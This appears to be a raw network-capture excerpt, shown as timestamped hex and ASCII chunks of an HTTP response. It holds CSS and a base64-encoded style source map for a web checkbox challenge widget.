                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1033INData Raw: 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 76 65 72 6c 61 79 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20
                                                                                                                                                                                                                                                                                                              Data Ascii: : #bbb;}.theme-dark #expired-refresh-link:active, .theme-dark #expired-refresh-link:hover, .theme-dark #expired-refresh-link:focus { color: #949494;}.theme-dark .overlay { border-color: #ffa299; color: #ffa299;}#challenge-error { margin: 0
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1034INData Raw: 20 77 69 64 74 68 3a 20 32 34 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34
                                                                                                                                                                                                                                                                                                              Data Ascii: width: 24px; height: 24px;}.ctp-checkbox-label input:active ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label input:active ~ span.ctp-label { text-decoration: underline;}.ctp-checkbox-label input:focus ~ .mark { border: 2px solid #c4
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1035INData Raw: 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 31 38 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20
                                                                                                                                                                                                                                                                                                              Data Ascii: n-items: center; justify-content: center; height: 118px;}.size-compact .link-spacer { margin-right: 3px; margin-left: 3px;}.size-compact .ctp-checkbox-container { text-align: left;}.size-compact #logo { margin-top: 5px; margin-bottom:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1037INData Raw: 6e 67 2d 72 69 67 68 74 3a 20 32 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 32 35 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 32 35 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 32 35 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 32 35 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66
                                                                                                                                                                                                                                                                                                              Data Ascii: ng-right: 2px; padding-left: 0;}.rtl #success-icon { left: 255px; margin-left: 8px;}.rtl #fail-icon { left: 255px; margin-left: 8px;}.rtl #spinner-icon { left: 255px; margin-left: 8px;}.rtl #expired-icon { left: 255px; margin-lef
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1038INData Raw: 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 23 74 65 72 6d 73 20 61 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 23 74 65 72 6d 73 20 61 3a 6c 69 6e 6b 2c 20 23 74 65 72 6d 73 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: font-style: normal;}#terms a { text-decoration: underline; line-height: 10px; color: #1d1f20; font-size: 8px; font-weight: 400; font-style: normal;}#terms a:link, #terms a:visited { text-decoration: underline; line-height: 10px; col
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1039INData Raw: 63 65 73 73 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 69 6c 6c 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 2e 6f 66 66 6c 61 62 65 6c 20 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 2e 6f 66 66 6c 61 62 65 6c 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 31 64 31 66 32 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 20 30 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 2e 34 73 20 66 6f 72 77 61 72 64 73 2c 20 73 63 61 6c 65 20 30 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 2e 39 73 20 62 6f 74 68 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: cess-circle { stroke: #1d1f20; fill: #1d1f20;}.offlabel .failure-circle { stroke: #1d1f20;}.offlabel #fail-icon { box-shadow: inset 0 0 0 #1d1f20; animation: fillfail-offlabel 0.4s ease-in-out 0.4s forwards, scale 0.3s ease-in-out 0.9s both;
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1041INData Raw: 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 0a 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 0a 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 0a 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 36 36 33 37 39 3b 0a 7d 0a 0a 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30
                                                                                                                                                                                                                                                                                                              Data Ascii: color: #1d1f20;}#fr-helper-link:active, #fr-helper-link:hover, #fr-helper-link:focus,#fr-helper-loop-link:active,#fr-helper-loop-link:hover,#fr-helper-loop-link:focus { color: #166379;}#expired-refresh-link { display: block; color: #1d1f20
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1042INData Raw: 72 69 67 68 74 3b 0a 7d 0a 2e 6c 61 6e 67 2d 6a 61 20 23 74 65 72 6d 73 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 2e 6c 61 6e 67 2d 6a 61 20 23 74 65 72 6d 73 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 6c 61 6e 67 2d 6a 61 20 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 7d 0a 2e 6c 61 6e 67 2d 6a 61 20 2e 73 69 7a 65 2d 63
                                                                                                                                                                                                                                                                                                              Data Ascii: right;}.lang-ja #terms { display: flex; flex-flow: column nowrap; justify-content: flex-end; line-height: 10px; font-style: normal;}.lang-ja #terms .link-spacer { display: none;}.lang-ja .ctp-label { font-size: 11px;}.lang-ja .size-c
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1043INData Raw: 34 37 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 65 31 33 30 33 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 63 6f 6e 73 6f 6c 61 73 2c 20 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 20 63 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 78 3b 0a 7d 0a 0a 2e 6c 61 6e 67 2d 69 74 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: 47; border: 1px solid #de1303; background-color: white; padding: 2px; height: auto; line-height: 8px; color: #de1303; font-family: consolas, "Liberation Mono", courier, monospace; font-size: 8px;}.lang-it .size-compact #challenge-error-
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1045INData Raw: 23 74 65 72 6d 73 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 20 20 7d 0a 20 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 74 65 72 6d 73 20 61 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 74 65 72 6d 73 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 20 20 7d 0a 20 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 74 65 72 6d 73 20 61 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 74 65 72 6d 73 20 61 3a 66 6f 63 75 73 2c 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 74 65 72 6d 73 20 61 3a 61 63 74 69 76 65 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 20 20 7d 0a 20 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 74 65 6d 72 73 20 61 3a 61 63 74 69 76 65 20
                                                                                                                                                                                                                                                                                                              Data Ascii: #terms a { color: #bbb; } .theme-auto #terms a:visited, .theme-auto #terms a:link { color: #bbb; } .theme-auto #terms a:hover, .theme-auto #terms a:focus, .theme-auto #terms a:active { color: #949494; } .theme-auto #temrs a:active
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1046INData Raw: 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 20 20 7d 0a 20 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 0a 20 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 0a 20 20 2e 74 68 65 6d 65 2d 61 75 74 6f 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 0a 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: .theme-auto #fr-helper-loop-link:link { color: #bbb; } .theme-auto #fr-helper-link:hover, .theme-auto #fr-helper-link:focus, .theme-auto #fr-helper-link:active, .theme-auto #fr-helper-loop-link:hover, .theme-auto #fr-helper-loop-link:focus,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1047INData Raw: 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 7a 73 37 51 55 46 48 53 6a 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4c 45 39 42 4d 55 68 4e 4f 30 56 42 4d 6b 68 4f 4f 30 56 42 51 30 45 37 4f 7a 74 42 51 55 64 4b 4f 30 56 42 51 30 6b 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 4f 7a 74 42 51 55 64 4b 4f 30 56 42 51 30 6b 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 52 55 46 44 51 53 78 72 51 6b 46 6f 53 57 6c 43 4f 30 56 42 61 55 6c 71 51 6a 74 46 51 55 4e 42 4f 7a 73 37 51 55 46 48 53 6a 74 46 51 55 4e 4a 4f 7a 73 37 51 55 46 48 53 6a 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 7a 73 37 51 55 46 48 53 6a 74 46 51 55 4e 4a 4f 30 56 42
                                                                                                                                                                                                                                                                                                              Data Ascii: 0VBQ0E7RUFDQTtFQUNBOzs7QUFHSjtFQUNJO0VBQ0E7RUFDQTtFQUNBLE9BMUhNO0VBMkhOO0VBQ0E7OztBQUdKO0VBQ0k7RUFDQTtFQUNBO0VBQ0E7OztBQUdKO0VBQ0k7RUFDQTtFQUNBO0VBQ0E7RUFDQSxrQkFoSWlCO0VBaUlqQjtFQUNBOzs7QUFHSjtFQUNJOzs7QUFHSjtFQUNJO0VBQ0E7RUFDQTtFQUNBOzs7QUFHSjtFQUNJO0VB
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1049INData Raw: 56 42 51 30 6b 37 52 55 46 44 51 54 74 46 51 55 4e 42 4c 45 39 42 65 6c 68 4e 4f 30 56 42 4d 46 68 4f 4f 7a 74 42 51 55 56 42 4f 30 56 42 51 30 6b 73 54 30 45 35 57 45 55 37 4f 30 46 42 5a 31 6c 47 4f 30 56 42 52 55 6b 73 54 30 46 73 57 55 59 37 4f 30 46 42 63 56 6c 47 4f 30 56 42 52 30 6b 73 54 30 46 79 57 55 59 37 4f 7a 74 42 51 54 42 5a 56 6a 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 4f 7a 74 42 51 55 64 4b 4f 30 56 42 51 30 6b 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 52 55 46 44 51 53 78 52 51 58 42 5a 56 7a 74 46 51 58 46 5a 57 44 74 46 51 55 4e 42 4f 7a 73 37 51 55 46 48 53 6a 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 7a 73 37 51 55 46 48 53 6a 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 52
                                                                                                                                                                                                                                                                                                              Data Ascii: VBQ0k7RUFDQTtFQUNBLE9BelhNO0VBMFhOOztBQUVBO0VBQ0ksT0E5WEU7O0FBZ1lGO0VBRUksT0FsWUY7O0FBcVlGO0VBR0ksT0FyWUY7OztBQTBZVjtFQUNJO0VBQ0E7OztBQUdKO0VBQ0k7RUFDQTtFQUNBO0VBQ0E7RUFDQSxRQXBZVztFQXFZWDtFQUNBOzs7QUFHSjtFQUNJO0VBQ0E7RUFDQTtFQUNBOzs7QUFHSjtFQUNJO0VBQ0E7R
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1050INData Raw: 48 53 6a 74 46 51 55 4e 4a 4f 7a 74 42 51 55 64 4b 4f 30 56 42 51 30 6b 37 52 55 46 44 51 54 73 37 51 55 46 4a 55 6a 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 73 37 51 55 46 46 51 54 74 46 51 55 4e 4a 4f 7a 74 42 51 55 74 5a 4f 30 56 42 51 30 6b 37 4f 30 46 42 54 33 42 43 4f 30 56 42 51 30 6b 37 4f 30 46 42 53 56 49 37 52 55 46 44 53 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 4f 30 46 42 52 30 6f 37 52 55 46 44 53 54 73 37 4f 30 46 42 53 56 49 37 52 55 46 44 53 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 52 55 46 44 51 53 78 50 51 58 4a 30 51 6b 30 37 52 55 46 7a 64 45 4a 4f 4f 30 56 42 51 30 45 37 4f 30 46 42 52 55 45 37 52 55 46 44 53 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 73 54 30 45 31 64 45 4a 46 4f 30 56 42 4e 6e 52 43 52 6a
                                                                                                                                                                                                                                                                                                              Data Ascii: HSjtFQUNJOztBQUdKO0VBQ0k7RUFDQTs7QUFJUjtFQUNJO0VBQ0E7RUFDQTs7QUFFQTtFQUNJOztBQUtZO0VBQ0k7O0FBT3BCO0VBQ0k7O0FBSVI7RUFDSTtFQUNBO0VBQ0E7O0FBR0o7RUFDSTs7O0FBSVI7RUFDSTtFQUNBO0VBQ0E7RUFDQSxPQXJ0Qk07RUFzdEJOO0VBQ0E7O0FBRUE7RUFDSTtFQUNBO0VBQ0EsT0E1dEJFO0VBNnRCRj
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1051INData Raw: 51 6b 55 37 4f 30 46 42 63 54 5a 43 54 6a 74 46 51 55 64 4a 4c 45 39 42 63 6a 5a 43 52 54 73 37 4f 30 46 42 65 54 5a 43 56 6a 74 46 51 55 4e 4a 4f 7a 73 37 51 55 46 4a 51 54 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 4f 30 46 42 53 55 45 37 52 55 46 44 53 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 4f 30 46 42 52 30 6f 37 52 55 46 44 53 54 73 37 51 55 46 48 53 6a 74 46 51 55 4e 4a 4f 30 56 42 51 30 45 37 4f 30 46 42 53 56 49 37 52 55 46 44 53 54 74 46 51 55 4e 42 4f 30 56 42 51 30 45 37 52 55 46 44 51 54 74 46 51 55 4e 42 4f 7a 74 42 51 55 56 42 4f 30 56 42 51 30 6b 37 4f 30 46
                                                                                                                                                                                                                                                                                                              Data Ascii: QkU7O0FBcTZCTjtFQUdJLE9BcjZCRTs7O0FBeTZCVjtFQUNJOzs7QUFJQTtFQUNJO0VBQ0E7RUFDQTtFQUNBO0VBQ0E7O0FBSUE7RUFDSTtFQUNBO0VBQ0E7RUFDQTtFQUNBO0VBQ0E7RUFDQTtFQUNBO0VBQ0E7O0FBR0o7RUFDSTs7QUFHSjtFQUNJO0VBQ0E7O0FBSVI7RUFDSTtFQUNBO0VBQ0E7RUFDQTtFQUNBOztBQUVBO0VBQ0k7O0F
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1053INData Raw: 55 46 76 63 6b 4e 50 4f 30 6c 42 51 30 6b 73 59 30 46 77 63 6b 4e 69 4f 7a 74 46 51 54 52 79 51 30 73 37 53 55 46 44 53 54 73 37 52 55 46 50 53 6a 74 4a 51 55 4e 4a 4f 7a 74 46 51 55 31 6f 51 6a 74 4a 51 55 4e 4a 4f 30 6c 42 51 30 45 73 61 30 4a 42 61 48 52 44 53 7a 73 37 52 55 46 76 64 45 4e 69 4f 30 6c 42 51 30 6b 37 4f 30 56 42 52 55 45 37 53 55 46 44 53 54 73 37 52 55 46 4a 55 6a 74 4a 51 55 4e 4a 4c 46 46 42 65 6e 52 44 54 54 74 4a 51 54 42 30 51 30 34 73 54 55 45 78 64 45 4e 4e 4f 7a 74 46 51 54 5a 30 51 31 59 37 51 55 46 42 51 54 74 4a 51 55 56 4a 4c 45 39 42 4d 58 56 44 52 6a 73 37 52 55 45 30 64 55 4e 46 4f 30 46 42 51 55 45 37 51 55 46 42 51 54 74 4a 51 55 56 4a 4c 45 39 42 4f 58 56 44 54 6a 73 37 52 55 46 70 64 6b 4e 46 4f 30 46 42 51 55 45 37
                                                                                                                                                                                                                                                                                                              Data Ascii: UFvckNPO0lBQ0ksY0FwckNiOztFQTRyQ0s7SUFDSTs7RUFPSjtJQUNJOztFQU1oQjtJQUNJO0lBQ0Esa0JBaHRDSzs7RUFvdENiO0lBQ0k7O0VBRUE7SUFDSTs7RUFJUjtJQUNJLFFBenRDTTtJQTB0Q04sTUExdENNOztFQTZ0Q1Y7QUFBQTtJQUVJLE9BMXVDRjs7RUE0dUNFO0FBQUE7QUFBQTtJQUVJLE9BOXVDTjs7RUFpdkNFO0FBQUE7
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1054INData Raw: 39 79 5a 47 56 79 4c 57 4e 76 62 47 39 79 4c 54 4d 36 49 43 4e 6d 5a 6d 45 79 4f 54 6b 37 58 47 34 6b 59 32 39 75 64 47 56 75 64 43 31 69 62 33 4a 6b 5a 58 49 74 59 32 39 73 62 33 49 74 4d 54 6f 67 49 32 55 77 5a 54 42 6c 4d 44 74 63 62 6c 78 75 51 47 74 6c 65 57 5a 79 59 57 31 6c 63 79 42 79 62 33 52 68 64 47 55 67 65 31 78 75 49 43 41 67 49 44 45 77 4d 43 55 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 42 30 63 6d 46 75 63 32 5a 76 63 6d 30 36 49 48 4a 76 64 47 46 30 5a 53 67 7a 4e 6a 42 6b 5a 57 63 70 4f 31 78 75 49 43 41 67 49 48 31 63 62 6e 31 63 62 6c 78 75 51 47 74 6c 65 57 5a 79 59 57 31 6c 63 79 42 7a 64 48 4a 76 61 32 55 67 65 31 78 75 49 43 41 67 49 44 45 77 4d 43 55 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 42 7a 64 48 4a 76 61 32 55 74 5a
                                                                                                                                                                                                                                                                                                              Data Ascii: 9yZGVyLWNvbG9yLTM6ICNmZmEyOTk7XG4kY29udGVudC1ib3JkZXItY29sb3ItMTogI2UwZTBlMDtcblxuQGtleWZyYW1lcyByb3RhdGUge1xuICAgIDEwMCUge1xuICAgICAgICB0cmFuc2Zvcm06IHJvdGF0ZSgzNjBkZWcpO1xuICAgIH1cbn1cblxuQGtleWZyYW1lcyBzdHJva2Uge1xuICAgIDEwMCUge1xuICAgICAgICBzdHJva2UtZ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1055INData Raw: 67 49 48 4e 30 63 6d 39 72 5a 53 31 33 61 57 52 30 61 44 6f 67 4d 44 74 63 62 69 41 67 49 43 42 39 58 47 35 39 58 47 35 63 62 6d 68 30 62 57 77 67 65 31 78 75 49 43 41 67 49 47 31 68 63 6d 64 70 62 6a 6f 67 4d 44 74 63 62 69 41 67 49 43 42 77 59 57 52 6b 61 57 35 6e 4f 69 41 77 4f 31 78 75 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 31 78 75 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 74 63 62 69 41 67 49 43 42 76 64 6d 56 79 5a 6d 78 76 64 7a 6f 67 61 47 6c 6b 5a 47 56 75 4f 31 78 75 66 56 78 75 58 47 35 69 62 32 52 35 49 48 74 63 62 69 41 67 49 43 42 74 59 58 4a 6e 61 57 34 36 49 44 41 37 58 47 34 67 49 43 41 67 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 4a 47 4a 68 59 32 74 6e 63 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: gIHN0cm9rZS13aWR0aDogMDtcbiAgICB9XG59XG5cbmh0bWwge1xuICAgIG1hcmdpbjogMDtcbiAgICBwYWRkaW5nOiAwO1xuICAgIHdpZHRoOiAxMDAlO1xuICAgIGhlaWdodDogMTAwJTtcbiAgICBvdmVyZmxvdzogaGlkZGVuO1xufVxuXG5ib2R5IHtcbiAgICBtYXJnaW46IDA7XG4gICAgYmFja2dyb3VuZC1jb2xvcjogJGJhY2tncm
